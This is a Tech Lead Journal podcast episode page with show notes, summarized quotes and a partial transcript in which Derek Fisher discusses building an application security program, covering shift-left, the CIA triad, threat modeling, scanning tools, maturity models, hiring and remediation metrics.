#138 - Building Application Security Program - Derek Fisher

 

   

“Building an application security program is about ensuring security is built into the software development lifecycle and how to respond to vulnerabilities."

Derek Fisher is the author of “Application Security Program Handbook”. In this episode, Derek shared about building an application security program and how to implement it in our organization. First, we discussed some security fundamental concepts, such as shift-left, CIA triad, and threat modeling. Derek then outlined how to start an application security program and measure the program’s success. Derek also touched on the security program maturity model and gave his tips on how to build and hire application security teams. Towards the end, Derek also gave his insights on how to address zero-day vulnerabilities when it becomes prominent.  

Listen out for:

  • Career Journey - [00:03:51]
  • Building Application Security Program - [00:06:56]
  • Shifting Left - [00:11:58]
  • CIA Triad - [00:16:30]
  • Threat Modeling - [00:19:04]
  • Threat Classification - [00:22:49]
  • Starting Application Security Program - [00:27:04]
  • Security Program Maturity Model - [00:32:45]
  • Building Security Teams - [00:35:27]
  • Measuring the Program’s Success - [00:40:19]
  • Zero Day Vulnerabilities - [00:42:48]
  • 3 Tech Lead Wisdom - [00:44:59]

_____

Derek Fisher’s Bio
Derek is an award winning author of a children’s book series in cybersecurity as well as the author of “The Application Security Handbook.” He is a university instructor at Temple University where he teaches software development security to undergraduate and graduate students. He is a speaker on topics in the cybersecurity space and has led teams, large and small, at organizations in the healthcare and financial industries. He has built and matured information security teams as well as implemented organizational information security strategies to reduce the organizations risk. His focus has been to raise the security awareness of the engineering organization while maintaining a practice of secure code development, delivery, and operations.

Follow Derek Fisher:

Mentions & Links:

 

Our Sponsor - Tech Lead Journal Shop
Are you looking for a new cool swag?

Tech Lead Journal now offers you some swags that you can purchase online. These swags are printed on-demand based on your preference, and will be delivered safely to you all over the world where shipping is available.

Check out all the cool swags available by visiting techleadjournal.dev/shop. And don't forget to brag yourself once you receive any of those swags.

 

Like this episode?
Follow @techleadjournal on LinkedIn, Twitter, Instagram.
Buy me a coffee or become a patron.

 

Quotes

Career Journey

  • We like to use the term shift left in cybersecurity. And I think if you’re gonna shift left, it doesn’t get any further left than that [children’s book].

  • [Alice Connected’s] a series – but it follows a couple of children as they get introduced to technology and some of the pitfalls that you have to deal with. Being able to set up a device securely, password hygiene, staying away from strangers, using games and being able to not get scammed during games.

  • We look at the way we are in society today and a lot of children of that age are obviously getting their own devices if they’re not using their parents. And so I think it’s important to try to impart some of that security concepts to them as early as possible.

Building Application Security Program

  • Every company is a software company. And whether you’re actually developing software or using software. All of us that work in the software space and understand how software gets made, knows that, at the very least, there are quality issues, if not security issues.

  • These companies that utilize that software will oftentimes collect data about their clients, about their customers, about their product. They may have IP that they’re trying to maintain. And all of this is being housed and utilized by the software that they bring into their organization. And it’s only getting more complex. When all of these different products talk to each other and integrate with each other and send data to and from each other, there’s opportunity there for weaknesses or vulnerabilities. And so that exposes the organization, exposes the data that they’re housing to malicious activity.

  • Even if your core competency is not software development and if your product isn’t in-house developed software, you still have exposure to this. And it’s critical to understand what are those vulnerabilities and how do you resolve those vulnerabilities when they are detected?

  • We are very good at being able to protect the perimeter. And that’s an old kind of mentality because as things shift to the cloud and as we have more SaaS tools that we’re using where things are kind of decentralized and not housed within a data center. We understand where those entry points are into our system. We understand kind of how the controls around that. But when your core competency is developing software and when your core product is an internally developed software product, it’s on that organization to ensure that we’re building security into that product and protecting the data that we’re collecting and using, in order to protect our clients.

  • Building an application security program is really about ensuring that security is built into that software development lifecycle. But not just into the software development lifecycle, but also how do we respond to vulnerabilities or findings as we move along that development pipeline all the way into the operational environment.

  • When you develop software and you push it out into a production environment. There’s a constant iteration. You’re constantly getting feedback from your clients. You have defects that you have to resolve and so forth. And those get pulled into the next set of requirements and development. And security’s no different when we find vulnerabilities in operations or if we find new zero days or so forth, those things need to be pulled back into the development environment and resolved.

  • Having a program in place that is able to really look at that entire software development life cycle and integrate security as part of that entire cycle is what building an application security program is all about.

  • Traditionally, we always try to protect the perimeter, whether it’s in versus the out. And maybe it worked last time, but I guess these days, security threats have become much more sophisticated. Not to mention there might be also insider security threat.

  • These days, there are so many entry points where security vulnerabilities can be found. And even if you don’t do anything, sometimes it could also happen that security vulnerabilities are being exposed. Think of like the Log4j vulnerability last time. Even though you didn’t change anything, you’re still exposed once this vulnerability is found.

Shifting Left

  • Today, if you look at discovering a vulnerability in the production environment, there’s a long path. There’s a path from the code being developed in a development environment, and then all the way to production. And there’s tools, there’s people, there’s processes that are all in place along that entire pipeline. All involved in the process of getting that code from a development environment into production.

  • And that’s a real cost. Think about it, a vulnerability going from the development environment into production. And all along that pipeline, there’s been people that have been involved with that code, that is potentially vulnerable going along until it gets into that production environment. Then, when it’s discovered in production, you now have support individuals that have to get on bridge calls to figure out what the issue is. Security people are called in. You might have to get pulled in incident response, forensics. Depending on the severity of the vulnerability, you now have a very costly vulnerability.

  • The goal of shifting left and the goal of being able to push the discovery of that vulnerability earlier in the process is really about bringing security and detection as early into the process as possible. And the way we do that is through training developers to, number one, not release security vulnerabilities in the first place, or at least be able to understand the code, patterns that result in secure software.

  • Additionally, try to layer in security scanning tools as early as possible. So that could be things like static analysis software, or what we call SCA (Software Composition Analysis) to look for those vulnerabilities as early in the process as possible. Things like secrets management, secrets discovery tools. All these can be used early in the process to detect any potential security issues that could manifest in a production environment.

  • And then all along that pipeline, you can also integrate other scanning tools that are designed for runtime environments like dynamic scanners or integrated software testing. So the goal there is to just continue to implement security tools along that path to discover those vulnerabilities before they get to a production environment.

  • As application security individuals, we’re starting to move away from the term shift left. Not that we don’t want to focus on discovering those vulnerabilities early, but we don’t want to forget that there are other methods of detecting vulnerabilities and ensuring that security is integrated across the entire life cycle.

  • We’re now trying to kind of overcorrect for the term shift left and pushing everything into the left-hand side of the development life cycle and sometimes forgetting about the rest of it.

CIA Triad

  • It’s not just those three components. There are other acronyms that leverage the CIA to also include things like authentication, accountability. But when you look at what we do from a security standpoint, it does pretty much come back to ensuring that data is secure and not exposed to somebody that shouldn’t be, that the data is not corrupted and is known to be trusted, and that data is available. The data and the systems are running the way they should be. And that there hasn’t been anything tampered with the system.

  • Just from a high level, with confidentiality, primarily we’re talking about encryption. Making sure that data is encrypted at rest, in transit, and in use. With integrity, we’re ensuring that we have hashing and checksums being used just to ensure that the data that was sent is the same data that was received. And with availability, you’re building highly redundant, highly available types of systems to ensure that when something is needed, it’s available.

Threat Modeling

  • We do threat modeling on a daily basis, whether we know it or not. We get in our car and we start driving and our mind is already doing, whether we consciously think about it or not, we’re doing threat modeling. Am I going the right direction? Is there gonna be traffic? Is this person gonna stop at this stop sign that I’m about to go through? And you build in certain mitigations and you determine like whether you’re doing the right thing.

  • On a basic level, threat modeling is essentially asking what can go wrong. It ultimately comes down to asking that basic question, what can go wrong? And once you identify what that wrong is, you start developing those mitigations and remediation efforts.

  • If you want to get started with threat modeling, there are a couple of different tools that I usually recommend. One is the Microsoft Threat Model tool, which is free to download. OWASP also has called a Threat Dragon, which is also a threat model tool, purpose-built for designing threat models. Other individuals and organizations will use things like PowerPoint or Visio or something like that.

  • Essentially, when you’re doing a threat model is that you’re drawing out the architecture of the system. And you wanna understand what the different touchpoints are in that system, whether they’re third party integrations, or whether they’re internal users or external users. You wanna know basically what that attack surface looks like for that system.

  • And then start asking those questions on each one of those integration points. Ask the question, what can go wrong? Can somebody spoof this call? Can somebody tamper with the data that’s coming through? Can someone perform a denial of service? Can someone change their access level from a simple user to an admin user? And you go through that with each one of those interactions with the system.

  • And so that’s the basic process of threat modeling is, designing that architecture, identifying the interaction points, and start asking those questions about what are the different attacks that could be performed, and then what are we gonna do about that?

  • There’s also a more, what we would call like a manual threat model process, which is essentially getting a bunch of individuals into a room with a whiteboard and doing the same thing, where you draw out the architecture, you start asking those questions.

  • When you look at doing a manual threat model on a whiteboard, it’s more time consuming. You can’t really take your whiteboard and check it into a repository somewhere. But you’re gonna tend to get better results in those manual type of threat model environments, cause you’re gonna get more collaborative responses from the people that are in that conversation. But it doesn’t scale as well. There are some tradeoffs, but, again, it all comes down to asking that question, what can go wrong and what are we gonna do about it?

Threat Classification

  • It comes down to understanding what the risk level or risk tolerances of the organization. And that’s a very key component that I think we’re missing in many companies, is how do you really know what the risk is of the findings that you find in your software? And we don’t always do a good job of that.

  • If you’re working inside of an organization, you know what your flagship products are. You know where your crown jewels are in terms of data. You know what the critical workflows are and you can determine like, okay, well this vulnerability that we found impacts this application, has potential to compromise this data that’s high risk, so we should tackle that.

  • However, again, we’re not great at being able to make that decision quickly and in a very calculated way. It tends to be more individual making. I don’t wanna say gut reaction, but it sort of is.

  • Risk really comes down to technical risk and business risk. There’s technical risk of are we gonna lose confidentiality, the integrity of the data, the availability of the system. And then from the business side, do we have compliance concerns? Do we have contractual concerns? Do we have dollar amounts that are assigned to downtime for this application? And marrying those two together really gives you the overall risk of what that vulnerability might be in the context of that application.

  • I think we’re kind of missing that context in a lot of organizations in terms of how do we frame those into those vulnerabilities that we find? How do we frame them into the right context so that we know what we’re tackling?

  • The other side of that is, from a technical standpoint, is what’s the exploitability of this vulnerability? And that’s another kind of piece that we’re not, as an industry, great at getting to. Application security teams can find vulnerabilities all day. Penetration testers can find vulnerabilities all day too. And we have no shortage of ability to be able to find vulnerabilities. Are these really actual issues that we need to be concerned about? Are they gonna actually go into a production environment? If they go into that production environment, are they actually going to be exploited?

  • Because in any mature organization, you’re gonna have runtime protection, you’re gonna have segmentation, you’re gonna have all these other controls in place that may make that vulnerability unexploitable. Understanding how to prioritize vulnerabilities and understanding how to really contextualize them is not easy. It’s understanding what is the organization’s risk, what’s the exploitability of that vulnerability, and, you know, putting that together and making a decision quickly.

Starting Application Security Program

  • Securing the development life cycle can be done a hundred different ways. And there can be any combination of tools. And I think it really comes down to a few things.

  • One is, what’s the budget tolerance? If you’re on a shoestring budget and you don’t have a lot of cash to just throw at a problem, then you have to be creative. If you are less constrained in that area, then you can have a little bit more leeway in being able to build a more robust security development program.

  • At some point, finding more vulnerabilities isn’t making you more secure. And in fact, it may make you, you’re not gonna get invited to the Christmas party and stuff like that, because all you’re doing is finding more vulnerabilities and making everybody angry. So I think at some point, you have to get quality over quantity.

  • It really does depend on the organization. What is the business budget tolerance? And what is your risk as an organization? If you’re a company that has no sensitive data, you are not processing credit cards, you’re not holding client data, there’s no sensitive information, you’re not gonna want to integrate all the security tools that Gartner puts out there and layer ‘em all into your development pipeline. But if you’re a large organization with high-risk data, high-risk workflows, then yeah, you’re gonna have a little different context.

  • The way I usually try to approach it is that, think about what are you trying to discover. And if you’re looking to discover vulnerabilities, the way to start with that is in those runtime types of tools, so DAST or IAST. The other thing is to get a penetration test. If you’re going to use a third party, that’s fine. If you have people in-house that can do it, that’s great.

  • You wanna find out what are our surface vulnerabilities that we need to be concerned about. Ones that would actually show up in an environment. And those tools, DAST and IAST and using a penetration testing engagement will help you get that information relatively quickly. But there are the concerns around scope. Like, do we get everything in the application? Are there any hidden corners that didn’t get caught by the scans?

  • And then SCA, software composition analysis. To me, it should always be integrated. It’s very low friction, usually low cost. There are open source tools out there that can help you. You can build your own based on some open APIs for access to things like the NVD (National Vulnerability Database) to get just basically look at your libraries and understand which ones of these libraries have known vulnerabilities in it that we need to replace. Set aside the code that we’re developing. The code that we’re pulling from repositories and third parties, are those vulnerable? And tools like SCA will certainly help with that.

  • I think getting the surface level vulnerabilities and getting the vulnerabilities that exist in the libraries that you’re using are core application security planks, I would say, in terms of building a program.

  • And then you start turning the screws there a little bit, looking at static analysis cause they tend to be noisy. And they tend to turn out a lot of vulnerabilities. But you can integrate them in the development environment. And if you have it properly tuned, if you’re using a good tool and if you have smart engineers and smart application security individuals, then you can get some value out of those and be able to try to head off things before they go into a production environment.

  • Additionally, start looking at your training program, your security training program, and making sure that engineers are getting the security training that will help them try to, again, reduce adding those vulnerabilities.

  • And the last thing I would say is a security champions program, which is really a sign of a mature application security program when you’re firing up a champions program. Because that’s usually where the tools are integrated, you’re getting the vulnerabilities, now you need additional help in trying to resolve those vulnerabilities. And that’s kind of where a champions team comes in.

  • These days I just want to highlight like we all use many software that are open sourced or are free to download. And it’s not just in terms of libraries or frameworks. Sometimes also the container images, the VM images, and things like that. There are so many things that people have built. I’m not saying that open source is not secure. But there are always points where maybe some hackers include some kind of malicious software inside those open source tools. And hence, having this SCA is actually very important.

Security Program Maturity Model

  • BSIMM and SAMM are the two that probably come to mind for most people. And they’re two different ways of looking at a maturity model.

  • BSIMM is looking at other organizations and doing basically an assessment of that organization and saying, well, here’s where this organization is from a maturity standpoint. And you, as your organization, can then look at that and say, well, where are we at? It’s essentially measuring yourself up against your peers and understanding what are the other organizations of my size in my industry, what is the one or two, three things that everybody in this category is doing? Am I doing those things? So that’s a good way of looking at are we doing the things that our peers are doing?

  • With OWASP SAMM, that’s more of a classic maturity model where, okay, here’s the level that you’re starting at and here are the things you need to do to get to level one. And then here are the things you need to do to get to level two, and so forth. And the goal there is to really look at those steps in the maturity model and having targets for where you want to be.

  • You may not have to be at the highest level of maturity. Again, going back to understanding what your organization does. If you’re not processing credit cards, if you’re not holding a client sensitive data and you’re not a critical app, you don’t need to be at the highest level.

  • What that does is it allows you to look at if we want to get to level two, here are the things we need to do. You need to build out a roadmap that says, here are the steps we’re gonna take to get to that level, and here’s a timeline that we’re gonna go to be there.

  • I think BSIMM is more valuable to me than SAMM. And the reason is that I wanna know what are the other organizations doing? Are we in line with that?

  • But sometimes just having conversations with your peers is just as relevant. When I’ve had conversations with peers and just trying to see what they’re doing compared to what I’m doing, and we’ll kind of exchange notes.

Building Security Teams

  • The first thing to realize is you’re never gonna scale to what you need. Don’t even bother. It’s not possible.

  • I could double the size of my team and it probably still wouldn’t be sufficient. And a lot of it is because application security is very different from security operations centers, very different from network security, and so forth.

  • The way I always describe it is, application security teams are the sidecar to engineering. We are the ones that have to be part of that development process to ensure that security is integrated. Now that doesn’t mean it has to be an individual. And if it is an individual, it doesn’t have to be an application security individual, which is why things like champions programs or security education programs are very helpful in the sense that you’re helping to drive security education across the engineering organization.

  • But if you are tasked with building an application security team, it comes down to asking the question, what do we want to do? Do we want to just be a team of penetration testers? Do we want to just be a team of engineers that are working with the developers in engineering and helping them to create secure code? Do we just wanna integrate tools and not do anything other than create, integrate tools, find vulnerabilities, and tell somebody, go fix ‘em. So it really comes down to understanding what is your organization going to tolerate and what are the actual needs for the team?

  • Every organization’s gonna have a different kind of view on that. And it really comes down to understanding what is the budget tolerance. What is the need from an organization’s perspective? And what is the roadmap for the application security team? Is it again, just developing, integrating tools and finding vulnerabilities? Do we wanna get more proactive in terms of blue teaming and purple teaming and red teaming to determine, discover those vulnerabilities, or are we just gonna stick to architecture and design?

  • Being able to hire the “right size” in terms of individuals, you’re not gonna do it.

  • I know BSIMM had some numbers around what is the right size. But again, it varies. It could be for every engineer you have or for every a hundred engineers, you have one AppSec person. For every 50, you have one. It really depends on the organization.

  • When it comes down to hiring, one of the things that I typically try to look for is somebody that has some type of development background. Because if you can’t speak the language with the development team, then you know you’re already at a disadvantage. Not that you can’t be in application security, cause obviously we have plenty of people that didn’t come out at development that are in application security. But it’s certainly helpful to have those individuals on your team to be able to really translate these vulnerabilities that come out of these tools and penetration testing and go back to the development team and say, “Looking at your code, here’s exactly what the problem is and here’s exactly how you can resolve it.”

  • That goes a long way, not just in making the organization more secure and making the application more secure, but also building that relationship between the development team and the application security team where we both understand each other, therefore we’re on somewhat common ground there.

Measuring the Program’s Success

  • There’s two main ones that I would focus on.

    • One is the downward trend on vulnerabilities, not upward.

      • We have no problem finding vulnerabilities. We can find them all day, every day. But it’s really, are we moving the needle and reducing that backlog? That to me is a better indicator of a security program where we’re reducing that backlog, not adding to it.

      • There’s been times where we’ve had scans done or tests done, and there weren’t any vulnerabilities that were found. All of us in the security space, immediately when you see a scan that comes back with no results are like, wait a minute, that can’t be right. But yeah, I think as long as you can validate that, no, this is right. I think that’s a good indication as well is that the program’s working right. We’re not finding things as much. We’re not adding to the backlog. We’re reducing it.

    • The other thing too is meantime to remediation.

      • How quickly are we resolving those vulnerabilities? Do we have vulnerabilities that are sitting out there for weeks, months, maybe even years?

      • If that’s the case, that’s a problem. Especially ones that are very long-lasting vulnerabilities, past several months or even a year or more. You have to ask a question, is this even still a valid issue? Something that’s been out there that long that there’s something not right there.

      • Looking at the amount of time that it takes to actually remediate a vulnerability is also a critical indicator of how successful the program is. Because, again, we can find vulnerabilities all day. But if a critical vulnerability is found and we’re able to remediate that within a few hours or a day or two or something like that, that’s a very strong indicator that your program is humming along the way it should.

Zero Day Vulnerabilities

  • I think that comes down to that meantime to remediation. The SCA example, the software composition. We can develop software and we can have zero vulnerabilities when that software goes out into production. The next day, some component that we pulled in from a repository could be vulnerable, whether it’s a zero day or whether it’s an identified public vulnerability. Either way, it’s vulnerable. And you did everything right. Time will result in vulnerabilities being found.

  • It really comes down to how your process is in place to take those vulnerabilities that have been discovered in a production environment and get a remediation out the door in a short period of time. That goes back to that meantime to remediation where if we find an issue in production and we’re able to get a remediation pushed to production in a very short period of time. That could be hours, that could be days, could be a week or so, then great. That means that your program is doing very well.

  • Runtime protection. There are tools out there, whether it’s WAF (Web Application Firewall) or Runtime Application Self-Protection. Those also go a long way in being able to provide some cover for a period of time until you can get that remediation out the door.

  • There are a lot of levers that we can pull from a security perspective to ensure that we are providing that protection against, especially things like zero days, where something like runtime protection does come into play. Because it allows you to do virtual patching and it allows you to potentially stop any malicious activity until you get the code out the door.

3 Tech Lead Wisdom

  1. Stay curious.

    • One thing with technology is that it’s always changing. And a prime example, everyone’s on the AI train right now where it’s everywhere. It’s inescapable and everyone’s trying to figure out what to do with it.

    • It’s an example of where technology’s always changing. One of the things with application security in general or more specifically is that we have to stay up to speed with what development’s doing.

    • The things that we were doing five years ago are vastly different than what we’re doing today. And so you have to be able to stay curious, stay engaged, and be able to know where the technology is heading.

  2. Be a mentor if you can, or be able to help others.

    • Especially in this space with security. There’s a lot of openings in security and we’re having trouble filling them. And I think we need help in this space. We definitely need people that want to get into security.

    • And I think being able to help mentor people and be able to bring them into this space is gonna help all of us. So find somebody that might be interested in security and try to help them along the way.

  3. Certifications aren’t always the answer.

    • I know that I could probably sit down and probably take a certification test and pass it today without studying on many of these. That doesn’t mean that I’ve achieved anything.

    • I’m not saying certifications are wrong or anything like that, because there’s definitely value in certifications. I know a lot of organizations look specifically for certifications to make a hiring decision.

    • What I’ve often found is that I like studying for certifications, whether I take the exam or not, because I tend to learn from that. Especially in this space, we see a lot of people that just want to get into security and the first question is, which certification should I take? And it’s like, well, you don’t necessarily have to get a certification in order to get into this space.

    • Start dabbling, start getting involved. When you’re looking at application security specifically, start understanding how software is developed. Start understanding about CI/CD pipelines and integrating tools and how code gets delivered and deployed and maintained. If you’re looking into getting into other aspects of security, you know, start understanding those different corners and really, really understand it. Not just understand it enough to pass an exam.

Transcript

[00:00:56] Episode Introduction

Henry Suryawirawan: Hey, everyone. Welcome to the Tech Lead Journal podcast, the podcast where you can learn about technical leadership and excellence from my conversations with great thought leaders in the tech industry. If you haven’t, please follow the show on your podcast app and social media on LinkedIn, Twitter, and Instagram. For video contents, Tech Lead Journal is also now available on YouTube and TikTok. And if you want to support my work, buy me a coffee at techleadjournal.dev/tip or subscribe as a patron at techleadjournal.dev/patron.

My guest for today’s episode is Derek Fisher. Derek is the author of “Application Security Program Handbook” and also a security instructor at Temple University. In this episode, Derek shared about building an application security program and how to implement it in our organization.

First, we discussed some security fundamental concepts, such as shift-left, CIA triad, and threat modeling. Derek then outlined how to start an application security program and measure the program’s success. Derek also touched on the security program maturity model and gave his tips on how to build and hire application security teams. Towards the end, Derek also gave his insights on how to address zero day vulnerabilities when it becomes prominent.

I think we don’t need a reminder that security is very important to get right. And regardless if you’re building application or just using an application, there’s an inherent security risk in the technologies and software we use.

And I hope you enjoy listening to this episode and learning a few things about building application security program. And if you do, it would be really awesome if you can share this with your colleagues, your friends, and communities, and also leave a five-star rating and review on Apple Podcasts and Spotify. It may sound simple, but it will help me a lot in getting more people discover the podcast on the platforms. Let’s go to the conversation with Derek after our sponsor message.

[00:03:20] Introduction

Henry Suryawirawan: Hey, everyone! Welcome back to another new episode of the Tech Lead Journal. Today, I have with me a guest named Derek Fisher. He’s the author of a book titled “Application Security Program Handbook”. As you can tell from the title itself, we’ll be talking a lot about application security and how to build a program within your company or within your team in order to put security at the forefront of the software development that you do. So Derek, thank you so much for your time, and I’m looking forward for our discussion today.

Derek Fisher: Yeah. Thank you Henry. Thank you for having me on and looking forward to discussing this topic.

[00:03:51] Career Journey

Henry Suryawirawan: So, Derek, I always love to ask my guest to share about himself or herself first in the beginning. So maybe if you can spend a bit of time telling us who you are and what are your highlights or turning points that you think are worth to share.

Derek Fisher: Yeah, so I’ve been in engineering for probably close to 30 years at this point. I started out in hardware engineering, actually designing circuit boards and working in mechanical engineering. I then moved on to software engineering after pursuing a Bachelor’s degree in computer science. And while I was working in software engineering, got introduced to someone, product security officer at Siemens, who then got me interested into cybersecurity and decided to pursue a Master’s degree in cybersecurity from Boston University at that point. Got into security engineering, security architecture, then started leading a team, and never looked back.

So, I currently run a product security function at a leading financial technology company. I teach software security at Temple University. As you know, I’ve written the book on building an application security program. And also have written several children’s books on cybersecurity as well. Try to stay active in the community. There’s always a lot going on. And I tend to keep myself busy. But it’s been a good journey.

Henry Suryawirawan: Before we go to actually your book, the Application Security Handbook, I’m interested when you say you also wrote a book for children about cybersecurity. Maybe you can tell us a little bit more about that book. What made you wrote a book and what kind of content that you are sharing to the kids here?

Derek Fisher: Yeah, I think we like to use the term shift left in cybersecurity. And I think if you’re gonna shift left, it doesn’t get any further left than that. So the reason I wrote it – it’s a series – but it follows a couple children as they get introduced to technology and some of the pitfalls that you have to deal with. Obviously, you know, being able to set up a device securely, password hygiene, staying away from strangers, using games and being able to not get scammed during games. So, you know, there’s a lot of different things. There’s, like I said, three books, so there’s a couple things, concepts that weave through those books.

But it’s intended to be kind of lighthearted and in a story format. So it’s not the typical textbook that I think we’re all kind of accustomed to reading. It’s developed for children that are in the 6 to 9, 6 to 10 year old range. They call it middle grade chapter book. So it’s meant for that age range of 6 to 10. And, you know, we look at the way we are in society today and a lot of children of that age are obviously getting their own devices if they’re not using their parents. And so I think it’s important to try to impart some of that security concepts to them as early as possible.

Henry Suryawirawan: Thank you for sharing that. So yeah, you are right. It is always better to have the shift left mentality, right? So in case of software development life cycle, shift left means in the earlier process. But I think you go beyond, like earlier phase of life, right? So teaching kids about cybersecurity. I hope they also get it, that these days we all have to be aware about security. And make sure our data, our privacy and security best practices being implemented in our day-to-day life, right? Including talking to strangers, sharing our identity, sharing our data, and things like that.

[00:06:56] Building Application Security Program

Henry Suryawirawan: Which brings us to the topic today that we would like to talk about, which is to implement application security program in a particular, for example, company, right? As we all know, application security has been at the forefront. We have seen in the news about security breaches, hacking, and things like that. Maybe if you can give a little bit of background, what is the current urgency for people to start thinking about building application security program within their company?

Derek Fisher: Yeah, I think in the book The Application Security Program Handbook, I talk about how every company is a software company. And whether you’re actually developing software or using software, you know, companies that their core product may not be software, but they’re certainly utilizing it. And so I think that all of us that work in the software space and understand how software gets made, knows that, at the very least, there’s quality issues, if not security issues.

And so these companies that utilize that software will oftentimes collect data from, again, even if their core function isn’t software. They’re collecting data about their clients, about their customers, about their product. They may have IP that they’re trying to maintain. And all of this is being housed and utilized by the software that they bring into their organization. And it’s only getting more complex. When all of these different products talk to each other and integrate with each other and send data to and from each other, there’s opportunity there for weaknesses or vulnerabilities. And so that exposes the organization, exposes the data that they’re housing to malicious activity.

So again, even if your core competency is not software development and if your product isn’t in-house developed software, you still have exposure to this. And it’s critical to understand what are those vulnerabilities and how do you resolve those vulnerabilities when they are detected?

Henry Suryawirawan: Yeah, and I read in one particular chapter, you also mentioned, even though the company seems to have just a little bit of technology, like enabling website or maybe just exposing something to the internet, right? They also have this kind of risk. So that for example, they are being defaced or some data is being leaked out, right? So all this becomes very relevant, even though you may not be a technology pure company. But once you introduce some kind of technology, especially internet, right? So things are becoming more dangerous, so to speak.

You mentioned about building security programs. So maybe for people here who are not yet familiar, because we always think security is somebody else’s job. Maybe if you can explain to us a little bit more what do you mean by building application security program?

Derek Fisher: If you have any familiarity with the security organization within your company, or if you’re already working in a security organization, you’re probably pretty familiar with the fact that we are very good at being able to protect the perimeter. And that’s an old kind of mentality because as things shift to the cloud and as we have more SaaS tools that we’re using where things are kind of decentralized and not housed within a data center. We understand where those entry points are into our system. We understand kind of how the controls around that. But when your core competency is developing software and when your core product is an internally developed software product, it’s on that organization to ensure that we’re building security into that product and protecting the data that we’re collecting and using, in order to protect our clients.

Building an application security program is really about ensuring that security is built into that software development lifecycle. But not just into the software development lifecycle, but also how do we respond to vulnerabilities or findings as we move along that development pipeline all the way into the operational environment. So when you develop software and you push it out into a production environment. For development that’s not where it ends, right? There’s a constant iteration. You’re constantly getting feedback from your clients. You have defects that you have to resolve and so forth. And those get pulled into the next set of requirements and development.

And security’s no different when we find vulnerabilities in operations or if we find new zero days or so forth, those things need to be pulled back into the development environment and resolved. So having a program in place that is able to really look at that entire software development life cycle and integrate security as part of that entire cycle, is what building an application security program is all about.

Henry Suryawirawan: Yeah, so I think I do get what you mean by saying traditionally we always try to protect the perimeter, right? Whether it’s in versus the out, right. And maybe it worked last time, but I guess these days, security threats have becoming much more sophisticated. Not to mention there might be also insider security threat. But I think these days there are so many entry points where security vulnerabilities can be found. And even if you don’t do anything, sometimes it could also happen that security vulnerabilities are being exposed. Think of like the Log4j vulnerability last time, right? Even though you didn’t change anything, but yeah, you’re still exposed once this vulnerability is found.

[00:11:58] Shifting Left

Henry Suryawirawan: Which brings us to the phrase that we commonly hear in the security world and also software development world is that, you quoted this in the book saying that fixing issues in production is significantly more expensive than fixing prior to production. So this comes back to our discussion earlier about shifting left, right? Maybe if you can explain a little bit more about this philosophy. What does it mean by shifting left? And why do we always have to care about fixing it earlier than the production?

Derek Fisher: Today, if you look at discovering a vulnerability in the production environment, there’s a long path. I mean, I say long, and that could be relative depending on the organization and what type of release methodology that they’re in. But there’s a path from the code being developed on a development environment, and then all the way to production. And there’s tools, there’s people, there’s processes that are all in place along that entire pipeline. And that can involve QA individuals. There could be Scrum masters, project managers, leadership that are all involved in the process of getting that code from a development environment into production. And that’s real cost, right?

If you think of, we’re looking at code going from development to production. But think about it, a vulnerability going from development environment into production. And all along that pipeline, there’s been people that have been involved with that code, that is potentially vulnerable going along until it gets into that production environment. Then when it’s discovered in production, you now have support individuals that have to get on bridge calls to figure out what the issue is. Security people are called in. You might have to get pulled in incident response, forensics. Depending on the severity of the vulnerability, you now have a very costly vulnerability.

Now, of course, results may vary. You may find a vulnerability in production that’s relatively easy to resolve or get to a good spot with. And you may have ones that are very extreme right? But the goal of shifting left and the goal of being able to push the discovery of that vulnerability earlier in the process is really about bringing security and detection as early into the process as possible. And the way we do that is through training developers to, number one, not release security vulnerabilities in the first place, or at least be able to understand the code, patterns that result in secure software.

Additionally, try to layer in security scanning tools as early as possible. So that could be things like static analysis software, or what we call SCA or software composition analysis to look for those vulnerabilities as early in the process as possible. Things like secrets management, secrets discovery tools. All these can be kind of used early in the process to detect any potential security issues that could manifest in a production environment. And then all along that pipeline you can also integrate other scanning tools that are designed for runtime environments like dynamic scanners or integrated software testing. So the goal there is to just continue to implement security tools along that path to discover those vulnerabilities before they get to a production environment. And there’s many different ways of doing that.

Now, not to kind of step on the term shift left here, but we’re starting to move away as application security individuals, we’re starting to move away from the term shift left. Just because, not that we don’t want to focus on discovering those vulnerabilities early, but we don’t want to forget that there’s other methods of detecting vulnerabilities and ensuring that security is integrated across the entire life cycle. Because, I think we’re now trying to kind of overcorrect for the term shift left and pushing everything into the left hand side of the development life cycle, and sometimes forgetting about the rest of it.

Henry Suryawirawan: Yeah, you made a good point, right? Security is not finished just by having so-called secure code and secure development practices, right? Once you put the code into production, that’s where the rubber hits the road, so to speak there, where you have attackers maybe constantly trying to look for vulnerabilities or things where they can attack.

And I think I even see it within my company from day to day. There are some just anomalies, traffics, like trying to attack by injection or attack by other means, right? And there are so many security scanning tools as well, like hacking tools that people are exposed with easily, so that they can use free software to scan any kind of internet port, websites, and things like that. So I think you are right that we should not be relaxed once we adopt secure coding practice and development pipeline practices, but always try to look holistically.

[00:16:30] CIA Triad

Henry Suryawirawan: Before we actually go into all these techniques that you implement in the program, right? One thing is for people to understand the risk, and normally the risk associated with security is summarized as a CIA triad, this thing about Confidentiality, Integrity, and Availability. So can you also explain to us what this CIA triad is and can all security risks actually be summarized into these three components only?

Derek Fisher: I mean, it’s not just those three components. There are other acronyms that leverage the CIA to also include things like authentication, accountability. But when you look at what we do from a security standpoint, it does pretty much come back to ensuring that data is secure and not exposed to somebody that shouldn’t be. That the data is not corrupted and is known to be trusted. And that data is available. And I say data, but the application, the system, it’s confidential. The data in there is confidential. The data and the systems are running the way they should be. And that there hasn’t been anything tampered with the system.

When you look at the CIA, a lot of it comes back to those three kind of main principles. And when we talk about the different ways of trying to integrate security to ensure that we’re maintaining the confidentiality, integrity and availability. Just from a high level, with confidentiality, primarily we’re talking about encryption. Making sure that data is encrypted at rest, in transit, and in use. With integrity, we’re ensuring that we have hashing and checksums being used just to ensure that the data that was sent is the same data that was received. And with availability, you’re building highly redundant, highly available types of systems to ensure that when something is needed, it’s available.

I used to work in the healthcare space, and I think the CIA was definitely, I think more prominent in the healthcare space than I would say in some of the other fields that I’ve worked in. Not that it’s not elsewhere, but definitely when you talk about using clinical applications that doctors are using to make decisions on patients, potentially life and death type of situations. You wanna make sure that that prescription, that the medication that the doctor is prescribing is what the doctor prescribed, is what’s actually being administered. In operating room, you wanna make sure that the systems are up and running so that the doctor can get access to that information when they need it. And you wanna make sure that patient data is well protected and not released. Again, in other fields, obviously the CIA is still critical. But it was very abundantly clear when I worked in the healthcare space how critical the CIA was.

[00:19:04] Threat Modeling

